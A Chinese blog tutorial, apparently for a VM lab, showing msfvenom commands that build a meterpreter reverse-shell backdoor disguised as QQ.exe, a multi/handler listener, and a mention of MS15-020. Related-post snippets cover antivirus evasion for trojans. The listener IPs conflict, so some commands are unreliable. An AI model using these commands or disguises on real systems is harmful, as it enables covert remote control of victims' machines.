MSF-Shellcode生成和MS15-020 渗透利用

最新推荐文章于 2025-03-13 10:40:42 发布
最新推荐文章于 2025-03-13 10:40:42 发布
阅读量779 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Ifeeexxj/article/details/103815129
版权
本文介绍了如何使用msfvenom生成Windows后门程序,并通过MS15-020漏洞进行渗透攻击。首先,通过msfvenom创建reverse_tcp后门,然后配置multi/handler进行监听。接着,确保网络环境和文件共享设置,将生成的exe文件传至目标主机。同时,关闭防火墙和安全软件以防止干扰。在目标主机上运行后门,即可获得shell控制。此外,还详细解释了利用MS15-020漏洞的过程,包括选择正确模块,设置payload和参数,最后在目标主机上执行lnk文件完成攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、生成window下后门程序
A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.130 LPORT=4444 -f exe > /qq.exe

2、重新打开一个配置窗口
use exploit/multi/handler
set payloads windows/meterpreter/reverse_tcp
set lhost 192.168.200.107
set lport 4444(默认)
exploit

3、找到生成的QQ.exe文件,把他复制到要攻击的主机上
这里要说几个注意事项
1.网络设配器最好都要在NET模式且IP地址为统一网关
2、复制不了的情况是因为没有设置文件共享的路径,两个虚拟机都设置一下
在这里插入图片描述
3、把自己电脑的防火墙,各种杀毒软件全关了,不然生成的木马软件会被自动移除

4、在被攻击的主机上打开QQ.exe,在输入shell就可以开始操控了
在这里插入图片描述

附:声称其他格式的木马程序的方法
在这里插入图片描述

最低0.47元/天 解锁文章
Tee.
关注
msf生成shellcode分析--走,组团分析shellcode
m0_64973256的博客
05-11 1078
作者丨selph 分析MSF Windows/exec Shellcode 最近分析漏洞用到msf生成的样本进行测试,其中用到payload选项为Windows/exec cmd="calc.exe"的这个payload,本着一定要知道利用代码是怎么运行的想法,开始对该shellcode的详细分析。 实验环境 •虚拟机:Kali Linux 2022.1 x64 •物理机:Windows 10 21H2 家庭版 •软件:x86...
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4782
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
MS15-020漏洞测试
aozhuo4755的博客
04-26 557
名称:Microsoft DLL植入远程代码执行漏洞(CVE-2015-0096)(MS15-020) 了解:Microsoft Windows没有正确处理DLL文件的加载,存在远程代码执行漏洞,通过诱使用户打开远程WebDAV或SMB共享上的某些文件利用此漏洞, 成功利用后可导致加载任意库。Windows使用.lnk来定义文件或者目录的快捷方式,可以使用.CPL文件来自定义图标。问...
kali 中使用msf生成远控木马入侵windows(简单易懂,小白轻松上手)
保持进步,保持少年感
01-31 867
kali 中使用msf生成远控木马入侵windows
木马免杀之MSFVenom制作木马
没有网络安全就没有国家安全
03-09 1451
木马免杀之MSFVenom制作木马
MSF编码器结合shellcode加载器实现免杀
2401_83237906的博客
11-24 471
所用环境:免杀技术简介: 免杀技术全称为反杀毒技术, Anti-Virus 简称“免杀”,指是一种能使病毒木马免于被杀毒软件查杀的技术。免杀技术的涉猎面广泛,其中包含反汇编、逆向工程、系统漏洞等技术,内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。这里介绍一个网站,这是一个免费的在线服务,它允许用户上传文件或提交网址,以检查它们是否包含恶意软件或其他潜在的安全威胁。VirusTotal 通过使用多种不同的病毒扫描引擎安全工具来分析提交的文件或链接,从而提供更全面的检测结果。
渗透-基于metasploit的内网渗透- ms10-002漏洞 - ms-15-020漏洞利用及其原理分析
joke_ljh的博客
08-31 4899
渗透-基于metasploit的内网渗透- ms10-002漏洞 - ms-15-020漏洞利用及其原理分析 漏洞利用及其原理分析 在前面已经讲了利用metaspolit工具利用ms08-067漏洞进行的内网渗透,但是假如你要渗透的对象你不在同一个局域网,那怎么办?你是不可能攻击到内网的主机,那我们可以想办法让它出来,让它出来主动与我们建立连接。 我们可以利用ms10-002漏洞来进行渗透,它是...
Kali下Metasploit的shellcode在windows中的使用
weixin_33744141的博客
02-24 740
网络拓扑:kaili系统版本:注:前面的版本在生成shellcode的时候用的是msfpayload命令 1.kaili生成shellcode:root@debian:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211 -f exe > /root/shell.exe()2.侦...
msf生成免杀木马
qq_56426046的博客
09-08 6025
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
MSF利用
weixin_43570648的博客
04-18 1016
其实MSF大部分都用来用ms17_010,其实MSF还有很多功能,比如用他来打打CMS的exp呀,还有对端口的攻击,生成payload,在此,我也记一个笔记,供大家分享。 1.首先基于MSF的资产收集 网络主机收集: use auxiliary/scanner/discovery/udp_probe use auxiliary/scanner/discovery/udp_sweep use au...
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
墨鱼菜鸡
07-11 6109
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的): 英文文档:https://nmap.org/book/man.html中文文档:https://nmap.org/man/zh/index.html#man-description官方 Nmap 项目指南:https://nmap.org/book/toc.html ...
MS15-010提权神器
09-24
MS15-010提权神器.shell提权,2015最新提权
MSF渗透
wo41ge的博客
11-24 3912
信息收集 获取目标机器的分区情况: post/windwos/gather/forensics/enum_drives 判断是否为虚拟机 post/windows/gather/checkvm 开启了哪些服务 :post/windwos/gather/enum_services 安装了哪些应用: post/windows/gather/enum_applications 查看共享: post/windows/gather/enum_shares 获取主机最近的系统操作: post/windows/gathe
简单的Msf木马免杀
weixin_47948655的博客
08-12 1446
简单加密shellcode与加载器实现msf木马免杀
Kali Linux使用Metasploit生成木马入侵安卓系统
简介
02-24 8628
前言,前言这是我最难想出来的对,这是我最后一篇文章,周一我们开学了,漏洞实战怕实现不了,至少放假可以更文章,我们只放一天,提示:以下是本篇文章正文内容,下面案例可供参考时间不够了,所以不做演示了,所以再见。
有关木马免杀操作
lkx18291546261的博客
11-19 621
木马免杀
渗透测试 --- 方法论
daibaohui的博客
02-21 1228
渗透测试(penetration testing,pentest)是实施安全评估(即审计)的具体手段。方法论是在制定、实施信息安全审计方案时,需要遵循的规则、惯例过程。人们在评估网络、应用、系统或三者组合的安全状况时,不断摸索各种务实的理念成熟的做法,并总结出了一套理论——测试方法论。本章简要介绍了渗透测试方法论的各关键要点,涉及的主题包括: ● 两种广为认知的渗透测试类型——黑盒测试白盒测试; ● 漏洞评估渗透测试的区别; ● 业界普遍采纳的安全测试方法论,以及其核心功能、特征优势; ●
基于kali的免杀木马技术研究
最新发布
q_1039692211的博客
03-13 750
现在的社会,信息化快速发展,开放的互联网不仅带给了人们极大的便利,也在快速传播恶意代码。黑客通过使用恶意程序攻击、隐藏在人们的计算机中,对受害用户的信息数据进行盗取、破坏、勒索,或者监控用户的行为等等操作。病毒与反病毒的对抗是计算机安全领域中最激烈,规模最大的博弈,这也是计算机安全领域中对抗爆发的地方。
Metasploit(msf)系列-木马免杀
chaojixiaojingang
10-10 9408
    木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 原理:        首先生成木马文件,然后将生成的木马文件与shellter免杀工具捆绑,然后设置监听,将捆绑后的文件拷贝到WinXP系统中,双击后,发现攻击成功,最后将该文件在腾讯哈勃分析系统上分析。 准备: 靶    机:WinXP系统  ip:192.168.1.10...
快速生成MSF Stager Shellcode工具:Veil-Ordnance介绍
- Metasploit是一个非常流行的渗透测试框架,它提供了大量的漏洞利用、攻击模板渗透测试工具。 - 在Veil-Ordnance的设计中,其有效载荷部分是直接从Metasploit框架中移植的,这意味着它能提供与Metasploit相似的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值